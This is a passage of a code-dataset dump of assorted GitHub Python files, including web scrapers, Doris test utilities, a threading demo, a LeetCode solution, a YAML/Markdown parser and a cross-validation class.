collate(adapted_batch)\n","repo_name":"priorMDM/priorMDM","sub_path":"data_loaders/tensors.py","file_name":"tensors.py","file_ext":"py","file_size_in_byte":5711,"program_lang":"python","lang":"en","doc_type":"code","stars":311,"dataset":"github-code","pt":"35"} +{"seq_id":"1909169119","text":"#功能:从扇贝背单词网上下载,生成到mp3path里\n# http://media.shanbay.com/audio/us/hello.mp3 美式发音\n# http://media.shanbay.com/audio/en/hello.mp3 英式发音\n\nimport csv\nimport os\nimport download\nimport time\nimport playsound\nimport searchwordApi\nimport os\n\n\n#with open('eng31.csv',encoding='utf-8') as englishFile:\n\nmydict=[]\nline=[]\nk=0\nwith open('eng.csv') as englishFile:\n englishReader = csv.reader(englishFile)\n for i in englishReader:\n #print(str(englishReader.line_num) + str(i[5]))\n if str(i[6])==\"1\":\n k=k+1\n word=str(i[5])\n wordmean=searchwordApi.getwordMean(word)\n #print(word)\n path=r'dict1/'+word+r'.mp3'\n #print(path)\n print(k)\n if os.path.exists(path)==False:\n print('单词找不到:'+word)\n if wordmean['mean'][0]==0:\n print(word)\n print('\\n-------查不到该单词\\n!')\n else:\n line=i\n line.append(wordmean['mean'])\n line=mydict.append(line)\n\n\nwriteFile=open('EnglishALl.csv','w',newline='')\ncsvWriter=csv.writer(writeFile)\nfor i in mydict:\n csvWriter.writerow(i)\nwriteFile.close()\n\n#print(len(mydict))\n#mydict= list(set(mydict))\n#print(len(mydict))\n \n #playsound.playsound(mp3path+str(i[5]) +'.mp3', True)\n\n\n","repo_name":"sigerclx/python","sub_path":"python-book01/2018/2018-07/EnglistTest/downloadJinshaMP3/creatWordlist.py","file_name":"creatWordlist.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"35419480972","text":"#!/usr/bin/env python3\n#coding: utf-8\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ MOAARR South Park ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# This is free software,\n# do whatever you want.\n# Except evil stuff!\n###############################################################################\nimport re\nimport pickle\nimport requests\nimport subprocess\nfrom bs4 import BeautifulSoup\n\nmain_url = \"http://www.southpark.de/alle-episoden/\"\n\n\ndef fetcher(url):\n r = requests.get(url)\n soup = BeautifulSoup(r.content, 'lxml')\n return soup\n\n\ndef extractor(results):\n links = []\n for item in results:\n sitem = str(item)\n if \"href\" in sitem:\n link = sitem.split('href=\"')[1].split('\">')[0]\n if 'http' in link:\n links.append(link)\n return links\n\n\ndef walker():\n soup = fetcher(main_url)\n res_season = soup.find_all('a', attrs={'class': re.compile(r'seasonbtn')})\n all_seasons = extractor(res_season)\n links = []\n for season in all_seasons:\n soup = fetcher(season)\n res_episodes = soup.find_all('h4')\n link_bundle = extractor(res_episodes)\n links.append(link_bundle)\n return links\n\n\ndef leecher():\n try:\n with open(\"all_links.txt\", 'rb') as f:\n link_list = pickle.load(f)\n except(OSError):\n link_list = walker()\n with open(\"all_links.txt\", 'wb') as f:\n pickle.dump(link_list, f)\n finally:\n for idx, season in enumerate(link_list):\n print(\"\\n++++\\nLeeching Season: \", idx+1, \"\\n====\\n\")\n for episode in season:\n print(episode)\n command = ['youtube-dl', '-o', '%(title)s.%(ext)s', episode]\n subprocess.call(command)\n\n\nif __name__ == '__main__':\n leecher()\n","repo_name":"gsec/spoo-dl","sub_path":"spoo-dl.py","file_name":"spoo-dl.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"10993344814","text":"import queue\nimport threading\nimport copy\n\nshared_queue = queue.Queue()\nresult_queue = queue.Queue()\n\nfor i in range(10):\n shared_queue.put(i)\n\ndef add_consumer():\n while True:\n try:\n item = shared_queue.get(block=False)\n item_copy = copy.deepcopy(item)\n result = item_copy + 10\n result_queue.put(result)\n shared_queue.task_done()\n print(\"Addition Consumer: {} + 10 = {}\".format(item, result))\n except queue.Empty:\n break\n\ndef multiply_consumer():\n while True:\n try:\n item = shared_queue.get(block=False)\n item_copy = copy.deepcopy(item)\n result = item_copy * 10\n result_queue.put(result)\n shared_queue.task_done()\n print(\"Multiplication Consumer: {} * 10 = {}\".format(item, result))\n except queue.Empty:\n break\n\ndef subtract_consumer():\n while True:\n try:\n item = shared_queue.get(block=False)\n item_copy = copy.deepcopy(item)\n result = item_copy - 5\n result_queue.put(result)\n shared_queue.task_done()\n print(\"Subtraction Consumer: {} - 5 = {}\".format(item, result))\n except queue.Empty:\n break\n\nadd_thread = threading.Thread(target=add_consumer)\nmultiply_thread = threading.Thread(target=multiply_consumer)\nsubtract_thread = threading.Thread(target=subtract_consumer)\n\nadd_thread.start()\nmultiply_thread.start()\nsubtract_thread.start()\n\nadd_thread.join()\nmultiply_thread.join()\nsubtract_thread.join()\n\nshared_queue.join()\n\nprint(\"All items processed\")","repo_name":"coenfuse/devops","sub_path":"extra/experiments/spmc/spmc2.py","file_name":"spmc2.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"72687401701","text":"import re\nimport time\n\nimport palo_client\nimport palo_config\nimport palo_logger\nimport palo_job\nimport palo_types\nimport util\n\nconfig = palo_config.config\nLOG = palo_logger.Logger.getLogger()\nL = palo_logger.StructedLogMessage\n\n\ndef get_client(host=None):\n \"\"\"get a new client\"\"\"\n if host is None:\n host = config.fe_host\n client = palo_client.get_client(host, config.fe_query_port, user=config.fe_user,\n password=config.fe_password, http_port=config.fe_http_port)\n return client\n\n\ndef create_workspace(database_name):\n \"\"\"get new palo client connect, and create db, and use and return client\"\"\"\n client = palo_client.get_client(config.fe_host, config.fe_query_port, user=config.fe_user,\n password=config.fe_password, http_port=config.fe_http_port)\n client.clean(database_name)\n client.create_database(database_name)\n client.use(database_name)\n return client\n\n\ndef check2(client1, sql1, client2=None, sql2=None, forced=False):\n \"\"\"\n check2\n client can be PaloClient or mysql.cursor\n \"\"\"\n if client2 is None and sql2 is None:\n assert 0 == 1, 'the input of check2() is wrong'\n elif client2 is None:\n client2 = client1\n elif sql2 is None:\n sql2 = sql1\n ret1 = client1.execute(sql1)\n ret2 = client2.execute(sql2)\n util.check(ret1, ret2, forced)\n return True\n\n\ndef get_explain_rollup(client, sql):\n \"\"\"\n Get explain table\n \"\"\"\n result = client.execute('EXPLAIN ' + sql)\n if result is None:\n return None\n rollup_flag = 'TABLE: '\n explain_rollup = list()\n for element in result:\n message = element[0].lstrip()\n profile = message.split(',')\n for msg in profile:\n if msg.startswith(rollup_flag):\n LOG.info(L('explain', msg=msg))\n table = msg[len(rollup_flag):].rstrip(' ')\n pattern = re.compile(r'[(](.*?)[)]', re.S)\n rollup = re.findall(pattern, table)\n explain_rollup.append(rollup[0])\n return explain_rollup\n\n\ndef assert_stop_routine_load(ret, client, stop_job=None, info=''):\n \"\"\"assert, if not stop routine load \"\"\"\n ret = client.show_routine_load(stop_job)\n if not ret and stop_job is not None:\n try:\n client.stop_routine_load(stop_job)\n except Exception as e:\n print(str(e))\n assert ret, info\n\n\ndef wait_commit(client, routine_load_job_name, committed_expect_num, timeout=600):\n \"\"\"wait task committed\"\"\"\n print('expect commited rows: %s\\n' % committed_expect_num)\n while timeout > 0:\n ret = client.show_routine_load(routine_load_job_name,)\n routine_load_job = palo_job.RoutineLoadJob(ret[0])\n loaded_rows = routine_load_job.get_loaded_rows()\n print(loaded_rows)\n if str(loaded_rows) == str(committed_expect_num):\n return True\n state = routine_load_job.get_state()\n if state != 'RUNNING':\n print('routine load job\\' state is not running, it\\'s %s' % state)\n return False\n timeout -= 3\n time.sleep(3)\n return False\n\n\ndef execute_ignore_error(func, *argc, **kwargs):\n \"\"\"execute ignore sql error\"\"\"\n try:\n func(*argc, **kwargs)\n except Exception as e:\n LOG.info(L('execute ignore error', msg=str(e)))\n print(e)\n\n\ndef execute_retry_when_msg(msg, func, *argc, **kwargs):\n \"\"\"当SQL返回的结果包含msg,则重试\"\"\"\n retry = 20\n while retry > 0:\n try:\n ret = func(*argc, **kwargs)\n return ret\n except Exception as e:\n if msg in str(e):\n time.sleep(3)\n retry -= 1\n LOG.info(L(\"get error msg\", msg=str(e)))\n return False\n\n\ndef check_by_file(expect_file, table_name=None, sql=None,\n client=None, database_name=None, **kwargs):\n \"\"\"\n 通过csv校验文件,验证表或sql的结果。\n 根据sql执行返回的列的类型,读取csv文件转化为相应的结构,进行校验\n expect_file: 校验文件\n table_name:表名,被校验的表\n sql: sql,被校验的sql查询,表和sql不能同时为None\n client: 执行sql的client,如果为None则重新创建连接\n database_name: 数据库名称\n **kwargs:可以指定sql或表中的类型,可在复杂类型中使用,例: k2=palo_types.ARRAY_INT\n 如array返回为字符串类型,对于array等可单独指定类型校验\n \"\"\"\n LOG.info(L('check file', file=expect_file))\n if table_name is None and sql is None:\n assert 0 == 1, 'there is no table and query to be checked'\n if client is None:\n client = get_client()\n if database_name:\n client.use(database_name)\n if table_name:\n if database_name:\n table_name = '%s.%s' % (database_name, table_name)\n sql = 'select * from %s' % table_name\n cursor, ret = client.execute(sql, return_cursor=True)\n result_info = cursor.description\n column_name_list = util.get_attr(result_info, 0)\n column_type_list = util.get_attr(result_info, 1)\n for col_name, col_type in kwargs.items():\n try:\n idx = column_name_list.index(col_name)\n column_type_list[idx] = col_type\n except Exception as e:\n print(type(col_name), type(column_name_list[1]))\n print(\"%s is not the column in %s\" % (col_name, column_name_list))\n expect_ret = palo_types.convert_csv_to_ret(expect_file, column_type_list)\n # 判断sql结果是否含有复杂类型,如果有,则需要对复杂类型进行处理\n if max(column_type_list) > 1000:\n ret = palo_types.convert_ret_complex_type(ret, column_type_list)\n util.check(ret, expect_ret, True)\n return True\n\n\ndef check_by_sql(tested_sql, expect_sql, client=None, database_name=None, **kwargs):\n \"\"\"\n 适用于复杂类型的两个sql结果校验。将两个sql分别执行,格式化处理,保存到文件中进行校验\n 通过**kwargs指定列的类型\n tested_sql: 被测sql\n expect_sql: 校验sql,预期正确的结果\n \"\"\"\n if client is None:\n client = get_client()\n if database_name:\n client.use(database_name)\n \n cursor, expect_ret = client.execute(expect_sql, return_cursor=True)\n # 根据cursor获取返回结果的列名和类型code\n result_info = cursor.description\n column_name_list = util.get_attr(result_info, 0)\n column_type_list = util.get_attr(result_info, 1)\n tested_ret = client.execute(tested_sql)\n \n for col_name, col_type in kwargs.items():\n try:\n idx = column_name_list.index(col_name)\n column_type_list[idx] = col_type\n except Exception as e:\n print(type(col_name), type(column_name_list[1]))\n print(\"%s is not the column in %s\" % (col_name, column_name_list))\n\n if len(kwargs) != 0:\n processed_expect_ret = palo_types.convert_ret_complex_type(expect_ret, column_type_list)\n processed_tested_ret = palo_types.convert_ret_complex_type(tested_ret, column_type_list)\n util.check(processed_tested_ret, processed_expect_ret, True)\n else:\n util.check(tested_ret, expect_ret, True)\n return True\n\n","repo_name":"apache/doris","sub_path":"pytest/lib/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":7332,"program_lang":"python","lang":"en","doc_type":"code","stars":10091,"dataset":"github-code","pt":"35"} +{"seq_id":"10174882639","text":"import requests\nfrom bs4 import BeautifulSoup\nheaders = {'User-Agent':'Chrome/75.0.3770.142'}\nmoviePy = []\nfor i in range(0,250,25):\n res_href = 'https://movie.douban.com/top250?start=%s&filter='%str(i)\n res = requests.get(res_href,headers=headers)\n html = res.text\n soup = BeautifulSoup(html,'html.parser')\n movie_li_allocation = soup.find('div',class_='article')\n movie_li = movie_li_allocation.find_all('li')\n for movies in movie_li:\n movie_name = movies.find('div',class_='hd').text.strip().replace('\\n','')\n movie_href = movies.find('div',class_='hd').find('a')['href']\n movie_rank = movies.find('div',class_='pic').text.replace('\\n','')\n # movie_info = movies.find('div',class_ = 'bd').text.strip()\n try:\n movie_quote = movies.find('span', class_='inq').text\n except AttributeError:\n movie_quote = ''\n try:\n movie_rate = movies.find('span', class_='rating_num').text\n except AttributeError:\n movie_rate = ''\n movie_cell = [movie_rank,movie_name,movie_quote,movie_rate,movie_href]\n moviePy.append(movie_cell)\n\nfor k in moviePy:\n print(k)","repo_name":"li841001/python3","sub_path":"L4/L4_practice_1.py","file_name":"L4_practice_1.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"42602353908","text":"# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n\nclass Solution:\n def isValidBST(self, root: TreeNode) -> bool:\n self.path = []\n \n self.in_order(root)\n\n for i in range(len(self.path) - 1):\n if self.path[i] >= self.path[i + 1]:\n return False\n \n return True\n \n def in_order(self, root: TreeNode):\n if root:\n self.in_order(root.left)\n self.path.append(root.val)\n self.in_order(root.right)","repo_name":"Howuhh/cs_algorithms","sub_path":"leetcode/bfs_dfs/medium/isValidBST.py","file_name":"isValidBST.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"35"} +{"seq_id":"41159362585","text":"import socket\r\nimport sys\r\nimport random\r\nimport math\r\n\r\n################################## Sender.py ######################################\r\n\r\n# This is the sender portion of the \"Go-Back-N\" algorithm\r\n#\r\n# Sender will send 5 packets at a time, but they might get lost before they get to Receiver\r\n# Packet loss is simulated with \"packet_loss_chance\" (default is 30%), there is a 30% chance\r\n# that the packet N will not make it to receiver\r\n# Receiver will send back Acks in sequential order; if it receives a packet out of order it will\r\n# continue to send an Ack for the last received packet until the Sender sends the correct packet\r\n\r\n################################# Creates Socket ######################################\r\n\r\nclient_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nclient_socket.settimeout(10)\r\nHOST = \"localhost\"\r\nPORT = 8000\r\nclient_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\nclient_socket.bind((HOST, PORT))\r\nclient_socket.listen(5)\r\nconn, address = client_socket.accept()\r\n\r\n#################################### Variables ########################################\r\n\r\n# Customizable variables\r\npacket_loss_chance = 30 # Set to 0 for 0% chance of packet loss\r\nnum_packets = 10 # Total number of packets to be sent\r\nwindow_size = 5 # Window size, all packets must be ACKed before window shifts\r\nmessage = \"Hello:\" # This is the message to be sent to the Receiver\r\n\r\n# Variables for program\r\nmax_n = math.ceil(num_packets/window_size)\r\nn = 1\r\nsequence_Num = 0\r\nhighest_Ack = 0\r\nack_Num = 0\r\ndisconnect_Msg = \"fin\"\r\nacks_Recv = 0\r\n\r\n################################ Functions ##################################\r\n\r\n# Simulates sending packets in window, with a [packet_loss_chance]% of losing a packet\r\ndef sendNPackets(sequence_Num):\r\n data = buildNPackets(sequence_Num)\r\n data = data.strip()\r\n \r\n if dataIsNotEmpty(data):\r\n #print(\"Data sent\", data)\r\n conn.send(data.encode())\r\n return True\r\n \r\n else:\r\n pass\r\n return False\r\n \r\n# Checks if data is empty\r\ndef dataIsNotEmpty(data): \r\n if (len(data) > 0):\r\n return True\r\n \r\n# Builds a string of packets to send to receiver \r\ndef buildNPackets(sequence_Num):\r\n data = \"\"\r\n for x in range(0, window_size):\r\n random_int = random.randint(1,100)\r\n \r\n # Max sequence number has been reached\r\n if (sequence_Num >= num_packets):\r\n continue\r\n \r\n # Packet is \"lost\"\r\n if (random_int < packet_loss_chance):\r\n sequence_Num += 1\r\n \r\n # Packet is not \"lost\"\r\n elif (random_int >= packet_loss_chance):\r\n data += message + str(sequence_Num) + \" | \"\r\n sequence_Num += 1 \r\n return data\r\n\r\n# Waits for Acks, will accept [window size] at a time\r\ndef waitForAcks(sequence_Num, highest_Ack, acks_Recv): \r\n for x in range(0, 5):\r\n response = conn.recv(6);\r\n \r\n if not response or response == \"\":\r\n continue \r\n \r\n else: \r\n ack_Num = getAckNum(response)\r\n evaluateAck(ack_Num) \r\n \r\n # Decide if highest Ack value needs to be updated \r\n if isNewHighestAck(ack_Num, highest_Ack):\r\n acks_Recv = acks_Recv + 1\r\n highest_Ack = ack_Num\r\n \r\n if isLastAck(ack_Num, num_packets):\r\n break\r\n \r\n sequence_Num = setNewSequenceNum(highest_Ack, acks_Recv)\r\n return sequence_Num, highest_Ack, acks_Recv\r\n\r\n# Set new Sequence Number based on highest Ack received\r\ndef setNewSequenceNum(highest_Ack, acks_Recv):\r\n if (int(acks_Recv) == 0):\r\n return 0\r\n else:\r\n return int(highest_Ack) + 1\r\n\r\n# Check if latest Ack received is the last one expected\r\ndef isLastAck(ack_Num, num_packets):\r\n if (int(ack_Num) == (num_packets - 1)):\r\n return True\r\n \r\n# Evaluate whether the latest received Ack is the highest one received \r\ndef isNewHighestAck(ack_Num, highest_Ack):\r\n if int(ack_Num) > int(highest_Ack):\r\n return True\r\n\r\n# Evaluate Ack to determine if it should be printed or not \r\ndef evaluateAck(ack_Num):\r\n # (Special Case) Hello:0 was not received\r\n if (int(ack_Num) < 0):\r\n pass\r\n \r\n elif (int(ack_Num) == highest_Ack and int(ack_Num) != 0):\r\n pass\r\n\r\n else:\r\n print (\"Ack:\",ack_Num)\r\n \r\n# Get Ack Num from response \r\ndef getAckNum(response):\r\n response = (response.decode())\r\n ack_Num = response.strip()\r\n ack_Num = response[4:].strip()\r\n return ack_Num\r\n\r\n# send disconnect message to Receiver, then close connection\r\ndef endConnection():\r\n print(\"All packets sent, closing connection.\")\r\n conn.send(disconnect_Msg.encode())\r\n \r\n################################ Beginning of Program ##################################\r\n# Sends N packets, waits for Acks, then sends next N packets based on the highest Ack received\r\n\r\nwhile sequence_Num < num_packets:\r\n try:\r\n if sendNPackets(sequence_Num) == True:\r\n sequence_Num, highest_Ack, acks_Recv = waitForAcks(sequence_Num, highest_Ack, acks_Recv) \r\n print(\"\")\r\n except socket.timeout:\r\n continue\r\nendConnection() \r\nclient_socket.close()","repo_name":"skurrrz/InternetTechnology_Project3","sub_path":"Go-Back-N/sender.py","file_name":"sender.py","file_ext":"py","file_size_in_byte":5370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"1021805338","text":"\"\"\"\nhttps://leetcode.com/problems/cousins-in-binary-tree/\n993. Cousins in Binary Tree\n\nIn a binary tree, the root node is at depth 0, and children of each depth k node are at depth k+1.\nTwo nodes of a binary tree are cousins if they have the same depth, but have different parents.\nWe are given the root of a binary tree with unique values, and the values x and y of two different nodes in the tree.\nReturn true if and only if the nodes corresponding to the values x and y are cousins.\n\nExample 1:\nInput: root = [1,2,3,4], x = 4, y = 3\nOutput: false\nExample 2:\nInput: root = [1,2,3,null,4,null,5], x = 5, y = 4\nOutput: true\nExample 3:\nInput: root = [1,2,3,null,4], x = 2, y = 3\nOutput: false\n\nConstraints:\nThe number of nodes in the tree will be between 2 and 100.\nEach node has a unique integer value from 1 to 100.\n\"\"\"\n\nfrom typing import Deque\n\n\n# Definition for a binary tree node.\nclass TreeNode(object):\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\nclass Solution(object):\n #02\n def isCousins(self, root: TreeNode, x: int, y: int) -> bool:\n def dfs(node, parent, depth, mod):\n if node:\n if node.val == mod:\n return depth, parent\n return dfs(node.left, node, depth + 1, mod) or dfs(node.right, node, depth + 1, mod)\n dx, px, dy, py = dfs(root, None, 0, x) + dfs(root, None, 0, y)\n return dx == dy and px != py\n\n #01\n def isCousins1(self, root, x, y):\n \"\"\"\n :type root: TreeNode\n :type x: int\n :type y: int\n :rtype: bool\n \"\"\"\n queue = Deque([root])\n \n while queue:\n size = len(queue)\n temp = {}\n for i in range(size):\n node = queue.popleft()\n if node.left:\n queue.append(node.left)\n temp[node.left.val] = node.val\n if node.right:\n queue.append(node.right)\n temp[node.right.val] = node.val\n \n if x in temp and y in temp and temp[x] != temp[y]:\n return True\n \n return False\n\nif __name__ == \"__main__\":\n t = TreeNode(1, left=TreeNode(2, right=TreeNode(4)), right=TreeNode(3))\n x = 1\n y = 2\n print(\"isCousins({0}, {1}, {2}): {3}\".format(t, x, y, Solution.isCousins(Solution, t, x, y)))\n\n\n\n# # 01\n# Runtime: 20 ms, faster than 66.49% of Python online submissions for Cousins in Binary Tree.\n# Memory Usage: 13.4 MB, less than 62.70% of Python online submissions for Cousins in Binary Tree.\n\n#02\n# Runtime: 24 ms, faster than 35.95% of Python online submissions for Cousins in Binary Tree.\n# Memory Usage: 13.5 MB, less than 62.70% of Python online submissions for Cousins in Binary Tree.\n","repo_name":"briansu2004/MyLeet","sub_path":"Python/993. Cousins in Binary Tree/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2845,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"41887090896","text":"from email import header\nimport os\nimport sys\nimport logging\n\nsys.path.append(\"../parser/goref.py\")\nfrom goref import GoRef\n\nsys.path.append(\"../parser/utils.py\")\nfrom utils import get_html_string, merge_dicts\n\nimport yaml\nimport markdown\n\n\nlogger = logging.getLogger(__name__)\n\nif __name__ == \"__main__\":\n # final list of all dicts that need to be converted to YAML\n combined_dict_list = []\n\n for file_name in os.listdir(\"metadata/gorefs/\"):\n if any(\n non_goref in file_name\n for non_goref in [\"README-editors.md\", \"Makefile\", \"README.md\"]\n ):\n continue\n\n file_name = os.path.join(\"metadata/gorefs/\", file_name)\n\n with open(file_name, \"r\") as file:\n data = file.read()\n\n goref = GoRef(file_name)\n\n # fetch YAML contents\n yaml_content = goref.parse(portion=\"yaml\")\n\n # fetch MD content\n md_content = goref.parse(portion=\"md\")\n\n # convert MD into HTML\n html = markdown.markdown(md_content)\n\n # get content between

        tags\n header_contents = get_html_string(\"h2\", html)\n\n # get content between

        tags\n paragraph_contents = get_html_string(\"p\", html)\n\n # enable this block if you want to handle multiple comments differently\n # if len(header_contents) != len(paragraph_contents):\n # logger.warning(\n # f\"There are standalone headers or paragraphs in: {yaml_content['id']}\"\n # )\n # continue\n\n title_desc_pair = {}\n\n title_desc_pair[\"title\"] = header_contents[0]\n title_desc_pair[\"comments\"] = paragraph_contents\n\n # yamldown content in the form of a dictionary\n merged_yaml_md = merge_dicts(yaml_content, title_desc_pair)\n\n combined_dict_list.append(merged_yaml_md)\n\n # export combined list of yamldown dicts compiled from all gorefs\n # and export to YAML\n with open(\"gorefs.yaml\", \"w\") as outfile:\n yaml.dump_all(combined_dict_list, outfile, sort_keys=False)\n","repo_name":"geneontology/go-site","sub_path":"scripts/goref_parser/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"35"} +{"seq_id":"35638546503","text":"import base64\n\ndef give64String():\n image = open('subject.jpg', 'rb') # open binary file in read mode\n image_read = image.read()\n image_64_encode = base64.encodestring(image_read)\n almostRetString = str(image_64_encode)\n\n\n retString = almostRetString.replace(\"\\\\n\", \",\")\n retRetString = retString.replace(\",\", \"\")\n finString = retRetString.split(\"'\")\n\n return finString[1]\n\n","repo_name":"AmanGotchu/MakeHarvard","sub_path":"base64encode.py","file_name":"base64encode.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"39117216806","text":"from transformers import AutoTokenizer, AutoModelForSequenceClassification\nimport datasets\nimport numpy as np\nfrom tqdm import tqdm\nimport torch\nfrom torch.utils.data import DataLoader\nfrom time import sleep\nimport sys\n\nmodel_name = \"andreas122001/bloomz-560m-wiki-detector\"\ndataset_name = \"wiki_labeled\"\nnum_data = None\n\n# Parses the job-name from the sbatch script for running bloomz-tuning\n# eval-rob-wiki-wiki\nif len(sys.argv) == 2:\n print(\"Using arguments from sbatch\")\n args = sys.argv[1].split(\"-\")\n if len(args) >= 3:\n model_name = \"andreas122001/\"\n if args[1] == \"rob\":\n model_name += \"roberta\"\n else:\n model_name += \"bloomz-\" + args[1]\n if args[2] == \"wiki\":\n model_name += \"-wiki-detector\"\n elif args[2] == \"abs\":\n model_name += \"-academic-detector\"\n \n dataset_name = \"research_abstracts_labeled\" if args[3] == \"abs\" else \"wiki_labeled\"\n print(\"Using arguments: \", model_name, dataset_name)\n else:\n raise Exception(\"Expected following format for input argument: 'eval-model-trainDataset-testDataset-xxx\")\n\nprint(f\"\\nModel: {model_name}\\nDataset: {dataset_name}\\n\")\n\n# Load dataset\ndataset = datasets.load_dataset(\"NicolaiSivesind/human-vs-machine\", dataset_name, split=\"test\")\nif num_data:\n dataset = dataset.select(range(num_data))\n\n# Load model and tokenizer into pipeline\ndevice = \"cuda\" if torch.cuda.is_available() else \"cpu\"\ntokenizer = AutoTokenizer.from_pretrained(model_name, device=device)\nmodel = AutoModelForSequenceClassification.from_pretrained(model_name, num_labels=2)\nmodel.to(device)\n\n# Define predict function\ndef predict(batch):\n encoding = tokenizer(batch, return_tensors=\"pt\", padding=\"max_length\", truncation=True, max_length=512)\n encoding = {k: v.to(model.device) for k, v in encoding.items()}\n\n outputs = model(**encoding)\n logits = outputs.logits.squeeze()\n pred = torch.softmax(logits.cpu(), dim=-1).detach().numpy()\n\n return np.argmax(pred, -1)\n\n# Perform tests\ntrues = [0, 0] # [negatives, positives] - all true negative and positive predicions\nfalses = [0, 0] # [negatives, positives] - all false negative and positive predicions\n\nnum_prints = 50 # how many times to print intermediate results\ndataloader = DataLoader(dataset, batch_size=3)\nfor i, batch in enumerate(tqdm(dataloader)):\n\n predicted_labels = np.array([predict(batch['text'])]).reshape(-1)\n real_labels = batch['label'].detach().numpy()\n\n # Assert reals and falses for positive and negative results\n for real, pred in zip(real_labels, predicted_labels):\n if real == pred:\n trues[pred] += 1\n else:\n falses[pred] += 1\n\n if i%max(1, len(dataloader) // num_prints) == 0:\n print(\"\\n\" +str(trues),str(falses))\n\n# Print result - sleep so tqdm doesn't overwrite results\nsleep(1)\nprint(\"\\nResults: (t/f)\")\nprint(\"trues = \" + str(trues))\nprint(\"falses = \" + str(falses))\nprint()\n\nmodel_name = model_name.split(\"/\")[-1]\nprint(f\"{model_name} on {dataset_name}\")\nfor i in trues:\n print(i)\nfor i in falses:\n print(i)\n","repo_name":"IDATT2900-072/MGT-Detection","sub_path":"models/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":3109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"38731971150","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom regression import Regression\nfrom sklearn.metrics import mean_squared_error as mse\n\n\nclass CrossValidation:\n\n def __init__(self, model, X, y, degree):\n self.X = X\n self.y = y\n self.degree = degree\n self.reg = Regression()\n self.model = model\n \n def rmse(self, pred, label):\n\n return np.sqrt(np.sum((pred - label) ** 2) / len(pred))\n \n def cross_val_error(self, kfold=10):\n N, D = self.X.shape\n slice_size = int(N / kfold)\n error = np.zeros(kfold)\n for i in range(kfold):\n X_train = np.delete(self.X, slice(i * (slice_size), (i+1) * (slice_size)), axis=0)\n y_train = np.delete(self.y, slice(i * (slice_size), (i+1) * (slice_size)))\n\n X_test = self.X[i * (slice_size):(i + 1) * (slice_size)]\n y_ground = self.y[i * (slice_size):(i+1) * (slice_size)] # Ground Label for test data\n if self.model == 'linear_regression':\n y_test = self.reg.linear_regression(X_train, y_train, X_test, degree=self.degree, normalized=False)\n elif self.model == 'ridge_regression':\n y_test = self.reg.ridge_regression(X_train, y_train, X_test, degree=self.degree, normalized=False)\n elif self.model == 'lasso_regression':\n y_test = self.reg.lasso_regression(X_train, y_train, X_test, degree=self.degree, normalized=False)\n\n error[i] = self.rmse(y_ground, y_test)\n\n return np.mean(error)\n \n ","repo_name":"SAAllegri/COVID-19_machine_learning_analysis","sub_path":"cross_validation.py","file_name":"cross_validation.py","file_ext":"py","file_size_in_byte":1558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"31792820157","text":"incorrect_symbols = ['+', '-', '.', ')', '(']\n\n\ndef normalize_number(call):\n \"\"\"Removes incorrect symbols from numbers and limits numbers length by 10 symbols\"\"\"\n for symbol in incorrect_symbols:\n call['caller'] = call['caller'].replace(symbol, '')\n call['recipient'] = call['recipient'].replace(symbol, '')\n if 'x' in call['caller']:\n split_list = call['caller'].split('x')\n call['caller'] = split_list[0]\n if len(call['caller']) > 10:\n call['caller'] = call['caller'][-10:]\n\n if 'x' in call['recipient']:\n split_list = call['recipient'].split('x')\n call['recipient'] = split_list[0]\n if len(call['recipient']) > 10:\n call['recipient'] = call['recipient'][-10:]\n return call\n\ncalls = []\nwith open('calls.txt', 'r') as file:\n for line in file:\n line = line.split('|')\n current_call = {}\n for i in line:\n i = i.replace('\\n', '')\n k, v = i.split(':')\n current_call[k] = v\n if int(current_call['duration_s']) > 120:\n current_call = normalize_number(current_call)\n calls.append(current_call)\nprint(*calls, sep='\\n')\nprint(len(calls))\n\ninitial_suspects = []\nwith open('suspects.txt', 'r') as file_suspects:\n for line in file_suspects:\n line = line.replace('\\n', '')\n for symbol in incorrect_symbols:\n line = line.replace(symbol, '')\n if 'x' in line:\n line = line.split('x')[0]\n if len(line) > 10:\n line = line[-10:]\n initial_suspects.append(line)\nprint(initial_suspects)\n\n\ndef iterate_suspects(list_of_initial_suspects, lap_number):\n with open('new_suspects_task3.txt', 'a') as new_suspects:\n for number in list_of_initial_suspects:\n new_suspects.write(number + '\\n')\n new_suspects.write(str(lap_number) + ' lap\\n')\n new_suspects_set = set()\n for call in calls:\n number_recipient = call['recipient']\n if number_recipient in list_of_initial_suspects:\n new_suspects_set.add(call['caller'])\n for number in new_suspects_set:\n new_suspects.write(number + '\\n')\n return 